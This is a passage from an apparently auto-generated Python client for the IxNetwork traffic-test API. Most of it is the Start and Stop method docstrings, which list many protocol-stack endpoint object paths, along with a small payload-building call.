- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampCon
trolRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/prot
ocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolSta
ck/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/pr
otocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethern
et/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoP
ppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i, arg in enumerate(args): payload['Arg%s' % (i + 2)] = arg
for key, value in kwargs.items(): payload[key] = value
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Teardown sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows multiple method signatures with the same name while Python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(Arg2=enum, async_operation=bool)
-------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/